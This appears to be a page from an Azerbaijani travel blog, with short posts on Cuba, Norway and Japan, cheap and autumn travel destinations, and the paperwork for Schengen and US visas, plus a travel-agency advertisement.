Ev Blog Səhifə 429

İnsanların ən çox gəzmək görmək istədiyi KUBA ölkəsi

0
Havana, Kuba
Havana, Kuba

ERNEST HEMİNGWAY “QOCA VƏ DƏNİZ” VƏ “ƏCƏL ZƏNGİ” ROMANLARINI KUBADA YAŞADIĞI İLLƏRDƏ YAZIB

GƏZİLƏCƏK GÖRÜLƏCƏK KUBA ÖLKƏSİ

ABŞ prezidenti Barack Obamanın səfəri və Rolling Stones qrupunun konserti ilə Kuba yenə son günlərin ən populyar ölkəsinə çevrildi. 1959-cu ildə yaşanan inqilab ilə dünyanın siyasi sistemindən də fərqlənən bu Karib ölkəsi, təbiəti və insanları ilə rəngli və əyləncəli koloritə sahibdir. Elə isə, gəlin Kuba ilə daha yaxından tanış olaq.

Kuba sözünün mənası ilə bağlı fərqli iddialar var. Qızıldərililərdən gələn “bərəkətli yer” kimi mənasının olduğunu deyən olsa da, bəziləri Kolumbun Portuqaliyada yerləşən bir qəsəbənin adını bu ölkəyə verdiyini iddia edir.

Kuba, Havana
Kuba, Havana

UNESCO tərəfindən aparılan araşdırmanın nəticələri göstərmişdir ki, Kuba dünyada ən çox görülmək istənilən ölkədir. Dünyanın böyüklüyünə görə 17-ci adası olan Kubanın 11 milyon əhalisi var. Ölkə torpaqlarının 22 faizi qoruq ərazisidir. Kuba təbiətinin ən maraqlı tərəflərindən biri odur ki, bu adada zəhərli bitki və heyvan yoxdur.

1956-cı ilin 2 dekabrında Granma (Nənə) adlı gəmi ilə sürgün edilmiş 82 nəfər Kuba sahilinə gəlmişdi. Aralarında Kastro qardaşları, Çe Gevaranın da olduğu inqilabçılar Sierra Maestra dağlarında 3 ilə yaxın mübarizə aparmışdılar. 82 nəfərin əksəriyyəti bu mübarizədə ölsə də, 1959-cu ildə Batista hökümətini devirərək, qalib gəlməyi bacarmışdılar.

Kuba deyəndə ağla gələn ilk şeylərdən biri də siqardır. ABŞ prezidenti J.F. Kennedinin Kuba məhsullarına qoyulan embarqodan əvvəl, 1200 Kuba siqarı aldığı iddia edilir.

KUBA PUROSU

Ən bahalı Puroları
Ən bahalı Puroları

Məşhur siqarların hazırlandığı fabriklərdə nəzarətçi-menecerlər iş saatının sonuna qədər işçilərə qazet və kitab oxumağa məcburdur.

Kuba demək rəqs deməkdir. Rumba, Bolero, Cha Cha ChaSalsa kimi rəqslər məhz burada məşhurlaşıb.

KUBA İÇKİSİ

Bütün dünyanın tanıdığı kokteylləri də var. Romkoladan hazırlanan məşhur “Cuba Libre” (Azad Kuba) bunlardan ən məşhurudur. Ancaq maraqlısı həmin kokteyl Kubada “Mentirita” (ağ yalan) olaraq adlandırılır.

Cuba Libre kokteyli
Cuba Libre kokteyli

KUBA MƏDƏNİYYƏTİ

Ernest HemingwayQoca və dəniz” və “Əcəl Zəngi” romanlarını Kubada yaşadığı illərdə yazıb.

Kuba dünyada ən güclü səhiyyə sisteminə sahib ölkələrdən biridir. Ortalama insan ömrünün 76 olması da təsadüf deyil. Digər Latın Amerikası ölkələrinin əksinə Kubada futbol ən populyar idman növü deyil. Kubalıları ən sevdiyi idman isə beyzboldur. Əhalisi zəngin olmasa da səhiyyə, təhsil və ev pulsuz olduğu üçün insanlar təməl ehiyaclarını qarşılaya bilir. Kubada küçə reklamları tamamilə yığışıdırılıb və icazə yoxdur. Hətta keçən həftə Havanadakı Rolling Stones konsertinin belə küçədə reklamı yox idi.

Kuba, Rolling Stones
Kuba, Rolling Stones

Payızda görməli şəhərlər hansılardır?

0

HƏM UCUZ, HƏM DƏ MARAQLI PAYIZ TƏTİLİ…

Adətən səyahət üçün yaz və yay aylarını seçirik. Əslində isə hər fəslin öz gözəlliyi olduğu kimi hər şəhərin də öz fəsli var ? Elə ölkə və şəhərlər var ki, ora məhz payızda, qışda getsən əylənə, ləzzət ala bilərsən. Səyahətçilərin sevimli saytı Gezmeli.az qış yetişməmiş səyahətə çıxmaq istəyənlər üçün payızda gediləcək şəhərlərdən yazıb.

1.TƏL-ƏVİV, İSRAİL

İsrail
İsrail

Yayda günəşdən tündləşmiş dərinlə vidalaşmağa hazır deyilsənsə, İsrailin paytaxtı Təl-Əviv sənin üçün ideal yerdir. Orda hələ yay davam edir. Günəş, isti qum, dəniz, axşam gəzintiləri, müxtəlif menyularla xidmətinizdə olan restoranlar və s. – sadəcə gedib görmək lazımdır. Dünyanın ən yaxşı 10 plyaj şəhərindən biri olan Təl-Əviv plyajlarında turistlərin azaldığı dövrdür payız. Həm istirahət, həm də sakitlik istəyirsənsə Təl-Əvivi seçə bilərsən.

2. SEVİLYA, İSPANİYA

İspaniya
İspaniya

Daha az günəşlə qane ola bilərsənsə İspaniyanın Sevilya şəhərini seçə bilərsən. İstiliyin təxminən 40 dərəcə olduğu bu şəhərə İspaniyanın “qızartma tavası” da deyirlər. Çox isti yerdir. Ancaq səyahətini payız aylarına planlaşdırsan, şəhərin ən gözəl vaxtını görərsən.

Küçələri portağal çiçəyi qoxan bu şəhərin kölgəli, açıq sahəsi olan restoranlarının qarşısı pivə içən yerli əhali və turistlərlə dolu olur.

Şəhərin çox olmayan tarixi məkanları və düz coğrafiyası var. Beləcə, ürəyin istədiyi qədər piyada gəzə bilərsən.

3. KANADA, ONTARİO

Kanada
Kanada

Payızın rənglərini görmək istəyirsənsə Kanadanın Ontario şəhərinə get. Buradakı “Algonquin Əyalət Park”ı məşhurdur. 7.725 kilometrlik ərazini əhatə edən, sıx meşə və çaylarla əhatələnmiş bu parkda əsl payız abu-havası olur. Payızdan qaçmaq əvəzinə, onu qucaqlamaq istəyirsənsə Ontarionu seçə bilərsən.

4. LİSSABON, PORTUQALİYA

Portuqaliya
Portuqaliya

Ucuz və sərfəli səyahət üçün Portuqaliyanın paytaxtı Lissabonu da seçmək olar.
Çünki hamının getdiyi vaxtlarda deyil, payız aylarında səyahət etmənin ən böyük avantajıdır ucuz qiymətlər. Çay kənarında olan bu şəhərdə 1000 illik tarixi və gözəl memarlıq abidələrini görə bilərsən. Günəş hələ də parıldayır, hava sərin, restoran və otellərdə ucuzluq. Bir sözlə, payızda həm ucuz həm də sərfəli səyahət axtarırsansa Lissabona gedə bilərsən.

Səyahət üçün ən ucuz 10 ölkə hansılardır?

0

SƏYAHƏT ÜÇÜN ƏN UCUZ 10 ÖLKƏ

1. RUMİNİYA

Ruminiya
Ruminiya

İki nəfərlik gündəlik büdcə: 80-90 dollar edir. Rumıniyada küçə yeməyinə rast gələ bilmərsən. Ucuz kafedə 5 dollara nahar edə bilərsən. Restoranda bir nəfər üçün naharın qiyməti 15 dollara başa gəlir.

Ümumilikdə, ölkədə qonaq evlərində iki nəfərlik nömrə və ya 2 ulduzlu mehmanxanada qalmaq 25-30 dollara başa gəlir. Buxarestdə mənzili gündəlik 30 dollara, Braşovedə isə 35-40 dollara kirayələmək olar.

2. SERBİYA

Serbiya
Serbiya

İki nəfərlik gündəlik büdcə: 70-80 dollar edir. Qarnirli kotlet və ya çörəkarası 2 dollardan baha deyil. Restoranda nahar 10 dollara başa gəlir. Belqradda sadə iki nəfərlik nömrə 35-40 dollaradır. Mərkəzdə mənzil tutmaq 25-35 dollara başa gələr.

3. GÜRCÜSTAN

Gürcüstan
Gürcüstan

İki nəfərlik gündəlik büdcə: 75-85 dollara yaxındır. Xaçapuri və lobianini hər küçə başında 1,5 dollara satırlar. Kafedə nahar 5-6 dollar edir. Tbilisi və Batumidə sadə iki nəfərlik yer 40 dollara başa gələcək. Digər yerlərdə, ucuz qonaq evlərində nömrə 15-30 dollardır.

4. TUNİS

Tunis
Tunis

İki nəfərlik gündəlik büdcə: təxminən 60-70 dollardır. Şakşuka, kolbasa-mergez və ya lablabi şorbası kimi yeməklər 3 dollara, restoranda nahar 8-9 dollar olacaq. Tunisdə ucuz qonaq evləri elə də çox deyil, amma 20-26 dollara sadə nömrə tapmaq olar.

5. MİSİR

Misir
Misir

İki nəfərlik gündəlik büdcə: 50-60 dollar edir. Misirdə küçə yeməyi çox ucuzdur: falafel, kuşari, şaverma 1,5 dollaradır. Restoranda orta hesablı çek 4-7 dollaradır. Sadə hosteldə otaq 15, gözəl oteldə isə 25-30 dollaradır.

6. NEPAL

Nepal
Nepal

İki nəfərlik gündəlik büdcə: dağlarda trekdə 40 dollara yaxın, ölkənin digər yerlərində 45-50 dollardır. Nepalda küçə kafesində doyunca yemək üçün 4-5 dollar bəs edir. Turistik kafelərdə iki nəfərlik nahar 15 dollardır. Hosteldə iki nəfərlik yer 5-8 dollardır. 15-20 dollara isə normal oteldə qalmaq mümkündür.

7. HİNDİSTAN

Hindistan
Hindistan

İki nəfərlik gündəlik büdcə: 40-45 dollardır. Hindistanda küçə yeməyi demək olar ki, havayıdır. Yerli yeməkxanada doyunca yemək 2,5 dollara olacaq, turistik restoranlarda orta hesab 3-6 dollar olacaq. Hər yerdə 5-8 dollara normal otağa sahib olacaqsız . Mumbayda və turistik yerlərdə mövsümün pik vaxtında xərclər 2-3 dəfə artır.

8. LAOS

Laos
Laos

İki nəfər üçün gündəlik büdcə: 55-65 dollar. Küçə kafelərində nahar 1-5 dollar, turistik kafelərdə isə 5-10 dollardır. İki nəfərlik orta qiymətli nömrə 10-15 dollara başa gələcək (Vyetnamda bir qədər bahadır).

9. İNDONEZİYA

İndoneziya
İndoneziya

İki nəfər üçün gündəlik büdcə: 40-50 dollar edir. Burada küçə yeməyi çox ucuzdur: qovrulmuş düyü və ya əriştə 1,5-2 dollardan baha başa gəlməyəcək, restoranda orta hesab 5-8 dollardır. Normal otellər Sumatrada 9-10 dollar, Yavada 10-15 dollar, Balidə 15-20 dollara başa gələr.

10. UKRAYNA

Tunnel of Love, Ukrayna
Ukrayna

İki nəfər üçün gündəlik büdcə: 20-30 dollar edir. Burada küçə yeməyi çox ucuzdur: borç və ya vareniki 1-2 dollardan baha başa gəlməyəcək, restoranda orta hesab 4-6 dollardır. Normal otellər Kievdə 7-10 dollar, Lvovda 10-15 dollar, Odessada 15-20 dollara başa gələr.

Şengen vizası üçün tələb olunan sənədlər hansılardır?

0

VİZA MÜRACİƏTİ ETMƏK İSTƏYİRSƏN, ANCAQ HANSI SƏNƏDLƏRİN LAZIM OLDUĞUNU BİLMİRSƏN? O ZAMAN DİQQƏTLƏ OXU

Şengen vizası

  1. Lazımı qaydada doldurulmuş, tarixi qoyulmuş və imzalanmış qısamüddətli viza müraciəti blankı;
  2. Açıq fonda 3.5×4.5 formatda təzəliklə çəkilmiş 1 ədəd rəngli fotoşəkil (üzün ölçüsü çənənin aşağısından başın ortasınadək 32 mm və 36 mm arasında olmalıdır);
  3. 10 ildə verilmiş və vizanın etibarlılıq müddəti bitəndən sonra ən azı 3 ay etibarlı olan, 2 ağ səhifəsi olan pasportun əsli və sürəti;
  4. Son 3 ildə alınmış vizaların sürəti;
  5. Şəxsiyyət vəsiqəsinin (azərbaycan) əsli və hər iki üzünün sürəti;
  6. Gedişli/qayıdışlı təyyarə bileti sifarişinin əsli və sürəti;
  7. Şengen məkanı üçün etibarlı olan, viza müddətini + 2 günü əhatə edən, repatriasiyanı nəzərdə tutan tibbi sığorta, əsli+ sürəti (siğorta məbləği 30 min avro olmalı və repatriasiya nəzərdə tutulmalıdır).
  8. Mehmanxana sifarişi (turistin soyadı, adı, doğum tarixi, pasport nömrəsi və səfərin müddəti yazılmaqla, mehmanxana əməkdaşının imzası və mehmanxananın möhürü ilə təsdiqlənmiş sənəd).

SONRAKI TƏLƏB VİZA MÜRACİƏTİ EDƏNİN SOSİAL VƏZİYYƏTİNİ ƏKS ETDİRƏN SƏNƏDLƏRDİR. BURADA BİR NEÇƏ SƏNƏD TƏLƏB OLUNUR.

  1. İş yerindən arayış (işəgötürənin, müəssisənin blankında verdiyi, möhürlü, imzalı, tarixli və müəssisənin ünvanını, telefon nömrələrini və faksını aydın göstərən arayış (tərcüməsi ilə). Bu arayışda imza edənin və viza müraciəti edənin familiyası və vəzifəsi, işçinin maaşının miqdarı və müəssisədəki iş stajı göstərilməlidir);
  2. Viza müraciəti edənin maddi vəziyyətini əks etdirən son üç ay üçün bank hesabından çıxarış. Bank hesabı olmasa maaş barəsində arayış və ya daşınmaz əmlak olmasını təsdiq edən sənəd.

Bütün bu qeyd edilən sənədlərin hamısı bir əsli və bir sürəti olmaqla yığılıb səfirliyə təqdim edilir.

Qeyd: Səfirlik sizdən əlavə sənəd tələb edə bilər.

Vizadan çətinlik çəkənlərin nəzərinə.

Avropaya Şengen Vizası əldə etmək üçün Go Travel turizm şirkətinə də müraciət edə bilərlər. Sizə orda lazimi köməkliyi göstərəcəklər.

Əlaqə nömrələri: (050-055-070) 664 60 30

Amerikaya viza üçün hansı sənədlər tələb olunur?

0

AMERİKAYA VİZA

Çoxları Amerikaya viza üçün, Şengendə tələb olunan sənədlərin istəndiyini söyləyir. Kimi deyir, iş yerindən arayış, bank hesabından çıxarış, səyahət sığortası, otel və təyyarə bileti bronu lazımdır. Kimi də deyir ki, sənəd boş şeydir, əsas ərizə formasını doldurmaqdır.

 

“BİZİ DÖNƏCƏYİNİZƏ İNANDIRIN”

Kimi deyir adına mülk, bank hesabından çıxarış lazımdır, kimi də bütün bunların lazımsız olduğunu söyləyir. Bir sözlə, hərə bir fikir bildirir. Elə mənə də Amerika səfirliyinin viza şərtləri maraqlı gəlirdi.  Bu yaxınlarda müraciət edib, öyrəndim.

Hansı sənədlərin tələb olunduğunu bilmək üçün əvvəlcə  səfirliyin saytında axtarış etdim. Konkret hansısa sənəd yazılmamışdı. Sadəcə “bizi dönəcəyinizə inandırın”, – deyilirdi.

NECƏ İNANDIRAQ?

Çox fikirləşəndən sonra bütün sənədləri toplamaq qərarına gəldim. Kim nə deyir hamısını.

Bankdakı hesaba qalacağım hər gün üçün 100 dollar qoyub, arayış çıxardım. Sonra bank hesabımdan son 6 aylıq çıxarış aldım. Səyahət siğortası, iş yerimdən arayış aldım. Adıma ev, maşın olması ilə bağlı sənəd təsdiqlətdim. Sonra otel və təyyarə biletini bron etdim. Daha sonra isə yeni foto çəkdirdim.

VİZA RÜSUMU – 160 DOLLAR

Növbəti mərhələdə Amerika səfirliyinin saytında hesab açdım. 5-6 səhifəlik ərizə formasını doldurdum, bura şəkil əlavə etdim. Sonra da viza üçün tələb olunan 160 dolları online ödədim. Ödəmə ilə bağlı emailə gələn təsdiq cavabını çıxardım. Daha sonra, bütün bu sənədlərlə birgə seçdiyim gün səfirliyə getdim.

22 NƏFƏRDƏN 17-NƏ “YOX” DEDİLƏR

Növbədə 22-ci idim. Mənə sıra gələnə qədər 17 nəfərə “yox” cavabı verdilər. Həyəcanlanmışdım. Nəhayət, içəri keçdim. Səfirlik əməkdaşı özümlə bağlı danışmağımı istədi. Danışdım, filan işi görürəm, filan yerdə işləyirəm, Novruz bayramına görə Amerikaya gedirəm və s. Bundan sonra mənə ağ, üstündə “sizin vizanız təsdiq olundu”, – yazılmış kağız verdilər. Passportu isə 5 gün sonra götürə biləcəyimi söylədilər. Və məndən hər hansı bir sənəd tələb olunmadı. O qədər sənədi yığmaq özümə qaldı ?

O QƏDƏR SƏNƏDLƏRİ HAZIRLAMAQ LAZIM İDİMİ?

Mən bilmədim, pasportumda viza sayı çox olduğu üçün belə etdilər, yoxsa normal prosedur belədir. Yenə də əmin ola bilmədim. O qədər sənəd toplamaq lazım idimi?

Məncə, bütün bu suallara son qoymaq üçün Fransa səfirliyi kimi, Amerika səfirliyi də viza almaq üçün tələb olunan sənədlərin siyahısını rəsmi saytına yerləşdirməlidir.

Vizadan çətinlik çəkənlərin nəzərinə.

Amerikaya Viza əldə etmək üçün Go Travel turizm şirkətinə də müraciət edə bilərlər. Sizə orda lazimi köməkliyi göstərəcəklər.

Əlaqə nömrələri: (050-055-070) 664 60 30

Turistlərin ən çox sevdiyi 5 GƏZMƏLİ YER

0

GƏZMƏLİ 5 YER

Dünyada gəzilib-görüləsi gözəl yerlər çoxdur. Bu gün sizə turistlərin sevdiyi, məşhur 5 məkandan danışacağam.

1. “WİSTERİA” TUNELİ, YAPONİYA

Wisteria, Yaponiya
Wisteria, Yaponiya

Wisteria” tuneli “Kawachi Fuji Gardens”-də yerləşir. Yaponiyanın Kitakyuşu şəhərində olan bu möhtəşəm bağ görənləri heyrətə salır. Bir-birindən gözəl qoxulu çiçəklər turistlərin xoşuna gəlir. Dünyanın ən gözəl tuneli seçilən bu yer aprelin ortalarından çiçəklər açmağa başlayır.

2. CİNQUE TERRE, İTALİYA

Cinque Terre, İtaliya
Cinque Terre, İtaliya

İtaliyanın şimalındakı “The Cinque Terre” 1997-ci ildən bəri UNESCO-nun mədəni irs siyahısındadır. İtalyan dilindən tərcümədə “beş kənd” mənasını verir. Dənizə tərəf dik şəkildə uzanan, terraslı təpələrin ətəyində qurulmuş beş kənddən ibarət olan bu yer turistlərin sevimli məkanıdır.

3. HOTEL LA MONTANA MAGİCA, ÇİLİ

Hotel La Montana Magica
Hotel La Montana Magica

Nağıllar aləmini xatırladan, möhtəşəm təbiəti ilə şəlalə kimi görünən otel yanardağ kimi inşa edilib. Lakin lava əvəzinə su püskürür. Burada eyni zamanda təbii qaynaq suları da  var.

4. “THE CROOKED FOREST”, POLŞA

Crooked Forest, Polşa
Crooked Forest, Polşa

Crooked meşəsi Polşanın şimal-qərbindəki Nowe Czarnowo qəsəbəsində yerləşir. Bu meşədə yerləşən təxminən 400-ə yaxın şam ağacı 90 dərəcə əyilərək böyüyür.  Sakinlər buradakı ağacların 10 yaşından sonra naməlum səbəbdən əyildiyini deyirlər. Bir çox araşdırmalara səbəb olan bu meşənin sirri hələ də bilinmir.

5.SEVGİ TUNELİ, UKRAYNA

Tunnel of Love, Ukrayna
Tunnel of Love, Ukrayna

Böyük ağacların sardığı bu tunel Ukraynanın Kleven şəhərindədir. Daha çox cütlüklərin seçimi olan yer buna görə “sevgi tuneli” adlanır və dünyanın ən gözəl yerləri arasındadır.

YER KÜRƏSİNİN ƏN XOŞBƏXT ÖLKƏSİ – NORVEÇ

0

YER KÜRƏSİNİN ƏN XOŞBƏXT ÖLKƏSİ NORVEÇ

Norveç bayrağı
NORVEÇ BAYRAĞI

 

NORVEÇİN XƏRİTƏDƏN GÖRÜNTÜSÜ

       Şimalı Avropada ,Skandinaviya yarımadasının qərb hissəsində və ona yaxın adalarda yerləşən dövlət.  Konstitusiyalı monarxiyadır. Paytaxtı Oslo şəhəridir. Norveç Skandinaviya yarımadasının qərbində yerləşib İsveç, Finlandiya və Rusiya ilə həmsərhəddir. Şimal ərazi boyu uzanan fyordlar Norveç təbiətinin ən ecazkar fenomenlərindən sayılır.

Norveç Krallığına Arktikada yerləşən bir neçə ada, Svalbard (Şpitsbergen adası və qonşu adalar daxildir) və Yan Mayen adaları da daxildir. Norveç Krallığının Svalbard üzərindəki mülkiyyət hüququ Svalbard Sazişi əsasında razılaşdırılmışdır. Bu saziş Yan Mayen adasına şamil edilmir. Cənubi Atlantik Okeanında yerləşən Buve və I Pyotr adaları da Norveçin tabeliyindədir. Bununla belə bu adalar krallığa məxsus deyildir. Norveçin Antraktidadakı “Şahzadə Mod Torpaqları”na da ərazi iddiları vardır. Həmin adada Norveçin “Troll” tədqiqat stansiyası yerləşir. Norveç 2001-ci ildən etibarən hər il insan inkişafı göstəricisinə görə birinci yeri tutur.

MƏDƏNİYYƏTİ

Ənənəvi xalq rəqsləri, mahnıları və hekayələri olduqca məşhurdur. Ölkə sənət sahəsində əhəmiyyətli insanlar yetişdirmişdir. Bunlardan rəssam Edvard Munch, bestekar Edvard Grieg, heykəltaraş Qustav Vigeland və oyun yazıçısı Henrik İseni misal göstərmək olar.

NORVEÇ

MƏTBƏXİ

Norveç mətbəxində qızartma som balığı, karides və morina balığı əhəmiyyətli yer tutar. Norveçdə insanlar nahar edərkən adətən süfrələrinədə şirin keçi pendiri və rinqa balığı turşusu olur. Spirtli içkilər qadağan olunduğu üçün onu bəzən tapmaq çətin olur.

 İQTİSADİYYATI

Norveçin iqtisadiyyyatı XX əsrin 50-60 cı illərindən yüksək sürtələ inkişaf etməyə başladı .Ölkədə hidrostansiyaların, gəmiqayırmanın inkişafı üçün böyük kapital qoyuldu. 1960-cı ldə Norveçin ticarət donanması müharibədən əvvəlki illərə nisbətən 2 dəfə artdı. Norveç ABŞ və İngiltərədən sonra özünün donanma tonnajına görə dünyada üçüncü yeri tutdu. Zəngin təbii ehtiyatlara malik olan Norveç iqtisadi cəhətdən yüksək səviyyədə inkişaf etmiş sənaye ölkəsidir. Sənayenin mühüm sahələri: neft və təbii qaz çıxarılması, yeyinti, sellüloz-kağız, metallurgiya, kimya, ağac emalı və gəmiqayırmadır. Norveç dünya bazarına böyük həcmdə balıq və balıq məhzulları çıxara dövlətlər sırasındadır. Kənd təsərrüfatında əsas bölmə heyvandarlıqdır. Ölkəyə lazım olan ərzaq məhzullarının yarıdan çoxu idxal edilir.

Oslo
NORVEÇ
NORVEÇ rəy sorğularına görə ən sakit və sülhsevər ölkə hesab edilmişdir

GÜNDOĞAN ÖLKƏ – YAPONİYA

0

YAPONİYA

Yapon dövlətinin rəsmi dilidir. Şərq dillərindən hesab olunur. Bu dildə 125 milyon insan danışır. Əlifbası çin dilinin kandzi xəttindən dönmüş xəttdir. Kandzi hiraqana və katakanada istifadə olunur. Bundan başqa imatokana deyilən və sadəcə imperator sarayında istifadə edilən bir xətt növü də var. 2000-dən çox kandzii hiraqana və kataqana hərəsi 47 hərfdir. Bu xətlərə bəzi əlamətləri artırdıqda başqa səslər əmələ gəlir. Müasir yapon dilində xüsusi şirkət adları , reklamlar və yapon dilinin kompyuterə keçirilmesinde romacı adı verilən latın əlifbası işlənir.Regions and Prefectures of Japan 2 az.svg

 

TƏBİƏTİ

Yaponiya Şərqi Asiyanın Sakit okean sahili boyunca uzanan 6.852 adadan ibarətdir. Sahil xəttinin uzunluğu təqribən 30 min km təşkil edir. Tərkibinə daxil olan bütün adaları hesaba qatdıqda ölkə 24° və 46° şimal en dairələri arasında və 122° və 146° şərq uzunluqları arasında yerləşir. Əsas adaları, şimaldan cənuba olmaqla, Hokkaydo, Honşu, Şikokuvə Kyuşudur. Okinava prefekturasının da daxil olduğu Ryukyu adaları Kyuşu adasının cənubu ilə əlaqələnir. Ümumilikdə bütün adalar birlikdə Yapon arxipelaqını əmələ gətirir.

Yaponiyanın 73 %-i meşəlik, dağlıq və sənaye, kənd təsərrüfatı və yaşayış üçün əlverişsiz ərazilərdən ibarətdir. Nəticədə, məskunlaşılmış ərazilər əsasən sahil zonalarına cəmlənmişdir və sahil zonalarındakı yaşayış məntəqələri əhalinin sayına görə fərqlənir. Yaponiya dünyada əhalinin ən sıx məskunlaşdığı ölkələrdən biridir.

Yaponiya adaları Sakit okean Odlu qövsündəki vulkanik zonada yerləşir. Adalar Silur dövrünün ortalarından Pleystosen dövrünə qədər davam etmiş okeanaltı tektonik fəaliyyətlərin nəticəsidir. Bu tektonik fəaliyyətlər Filippin plitəsinin materik mənşəli Amur və Okinava plitələrinin cənubuna doğru subduksiyası və Sakit okean plitəsinin Oxot plitəsinin şimalına doğru subduksiyası ilə xarakterizə olunur. Yaponiya əslində Avroasiya materikinin şərq sahilinə bitişik idi. 15 milyon il əvvəl hərəkət edən plitələr Yaponiyanı materikdən ayıraraq şərqə doğru “sürükləmişdir” və Yapon dənizinin əmələ gəlməsinə səbəb olmuşdur.

Yaponiyada 108 fəaliyyətdə olan vulkan yerləşir. XX əsr boyunca Hokkaydodakı Şova-şinzan və Beyonesu qayalıqlarındakı Myocin-şo kimi bir neçə yeni vulkan püskürmüşdür. Tez-tez sunami ilə nəticələnən dağıdıcı zəlzələlər hər əsrdə bir neçə dəfə meydana çıxmışdır. 1923-cü ildə Böyük Kanto zəlzələsi 140.000 nəfərin ölümünə səbəb olmuşdur. Digər baş vermiş dağıdıcı zəlzələr Böyük Hanşin zəlzələsi (1995) və Tohoku zəlzələsidir (2011). Tohoku zəlzələsi 11 mart 2011-ci ildə baş vermiş və dəhşətli sunamiyə səbəb olmuşdur.  Odlu qövsdəki mövqeyinə görə Yaponiya zəlzələ və sunamilərə meyilli ölkədir  və inkişaf etmiş ölkələr arasında ən böyük təbii fəlakət riskinə malik dövlətdir.

FUCİ DAĞI

 

OQASAVARA ADASI

 

KEQON ŞƏLALƏSİ

İQTİSADİYYATI

Müasir Yaponiya iqtisadiyyatı Edo dövründə böyüməyə başlamışdır. Edo dövrünün salamat qalmış elementləri su və quru yolları, eləcə də Osaka düyü brokerlərinin fyuşers kimi maliyyə vasitələri aiddir.  1868-ci ildə başlamış Meyci dövründə Yaponiya bazar iqtisadiyyatından faydalanaraq inkişaf etmişdir.  Müasir dövrün bir çox müəssisəsi bu dövrdə peyda olmuş və Yaponiya Asiyanın ən inkişaf etmiş dövləti olmuşdur.  1960-cı illərdən 1980-ci illərə qədər Yaponiya iqtisadiyyatı olduqca inkişaf etmişdir (“Yaponiya iqtisadiyyatının möcüzəsi”): 1960-cı və 1970-ci illərdə 7,5 % və 1980-ci illərdə və 1990-cı illərin əvvəllərində isə 3,2 % ortalamasına çatmaq mümkün olmuşdur.

İqtisadiyyatın inkişafı 1990-cı illərdə (“İtirilmiş onillik”) baş vermiş Yaponiya iqtisadi köpüyünə görə yavaşlamağa başlamışdır. İqtisadiyyatı yenidən dirçəltmək səyləri uğursuz olmuşdur və ardınca 2000-ci ildə dotkom köpüyü baş vermişdir.  İqtisadiyyat 2005-ci ildə bərpa olunmağa başlanmışdır; ÜDM 2005-ci ildə ABŞ və Avropa ölkələriningöstəricilərini keçərək 2,8 % artmışdır.

2012-ci ildən Yaponiya ÜDM baxımından ABŞ və Çindən sonra dünyanın ən güclü 3-cü milli iqtisadiyyatına, alıcılıq qabiliyyəti pariteti baxımından isə ABŞ, Çin və Hindistandan sonra dünyanın ən güclü 4-cü milli iqtisadiyyatına malikdir. 2014-cü ildə Yaponiyanın dövlət borcunun illik Ümumi Daxili Məhsulun 200 %-dən çox olduğu hesablanmışdır (bu göstəriciyə görə dünyada birincidir).

 

 NƏQLİYYAT

 

Yaponiyanın yol xərcləri əhatəli olmuşdur.  Ümumi uzunluğu 1,2 milyon kilometr olan yol şəbəkəsi nəqliyyatın əsasını təşkil edir.  Məhdud ödənişli avtomobil yolları əsas şəhərləri əlaqələndirir və rüsum toplayan məntəqələr tərəfindən nəzarət olunur. Yeni və istifadə olunmuş avtomobillər ucuzdur; avtomobil mülkiyyətçiliyindən və yanacaqdan əldə olunan gəlir enerjinin məhsuldarlığını artırmaqda istifadə olunur. Lakin keçdiyi bütün məsafənin cəmi 50 faizində, Yaponiya avtomobilin istifadəsinə görə G8 ölkələri arasında ən aşağı göstəriciyə malik ölkədir.

1987-ci ildəki özəlləşdirmədən bəri Yaponiya dəmiryol şirkətlərinin çoxu regional və yerli sərnişindaşıma bazarında rəqabət içərisindədir. Yaponiyanın əsas dəmiryol şirkətləri Japan Railways Group, Kintetsu Corporation, Seibu Railway və Keio Corporation şirkətləridir. Maksimum sürətləri 240–320 km/saat olan Şinkansen qatarları Yaponiyanın əsas şəhərlərini birləşdirir. Yaponiya qatarları təhlükəsizliyinə və dəqiqliyinə görə tanınır. Tokio ilə Osaka şəhərləri arasında yeni Maglev xəttinin salınması təklifi müasir mərhələdədir.  Yaponiyada 175 hava limanı yerləşir;  Yaponiyanın ən böyük hava limanı olan Tokio hava limanı (və ya Haneda hava limanı) Asiyanın ikinci ən işlək hava limanıdır. Yaponiyanın digər ən böyük hava limanları Narita hava limanı, Kansai hava limanı və Çubu hava limanıdır.  Naqoya limanı Yaponiyanın ən böyük və işlək limanıdır. Ölkənin ticarət dəyərinin 10 %-i bu limanın payına düşür.

MƏDƏNİYYƏTİ

Yaponiya mədəniyyəti ölkənin tarixi köklərindən son dərəcə təsirlənərək inkişaf etmişdir. Müasir mədəniyyət isə Asiya, Avropa və Şimali Amerikanın təsiri ilə formalaşmışdır. Ənənəvi Yaponiya mədəniyyəti keramika məmulatları, toxuculuq məhsulları, lakirovanlar və gəlinciklər kimi əl işləri ilə, bunraku, kabuki, noh, rəqs və rakuqo kimi performans sənətləri ilə, çay mərasimi, ikebana, döyüş sənətləri, xəttatlıq, oriqami, onsen, Geyşa, xalq oyunları və digər məşğuliyyətlərlə xarakterizə olunur. Yaponiya nəzərə çarpan və ya nəzərə çarpmayan Mədəniyyət abidələrini və Milli xəzinələrini qorumaq və tanıtmaq üçün sistem inkişaf etmişdir.  Yaponiyanın 19 yeri YUNESKO-nun Ümumdünya irsi siyahısına düşmüşdür və bu yerlərdən 15-i mədəni əhəmiyyət daşıyır.

japanese dance Страны Япония japan teatralizovannoe deystvo 1600 Япония japan teatralizovannoe_deystvo_1600.jpg

MƏTBƏXİ

Yaponiya mətbəxi  təməl qida növləri, səciyyəvi olaraq yapon düyüsü və ya əriştələri, sous və okazu (balıq, tərəvəz və tofudan hazırlanan yemək) ilə xarakterizə olunur. Müasir dövrün əvvəllərində istifadə olunmağa başlanan qırmızı ət kimi inqredientlər əvvəllər Yaponiyada geniş istifadə olunmamışdır. Yaponiya mətbəxi yeməklərin mövsümiliyinə  və prezentasiyasına, inqredientlərin keyfiyyətinə görə tanınır. Milli mətbəxlə yanaşı regional mətbəxlər də ənənəvi reseptləri və yerli inqredientləri ilə seçilir. Mişlen bələdçisisi tərəfindən restoranları ən çox ulduz alan ölkə Yaponiyadır.

 

suşi

Yaponiya həqiqətəndə fərqliliyi ilə seçilən ölkələrdəndir.

AVROPANIN BRENDİ – İTALİYA

0

İTALİYANIN  GÖZƏLLİKLƏRİ

İTALİYA

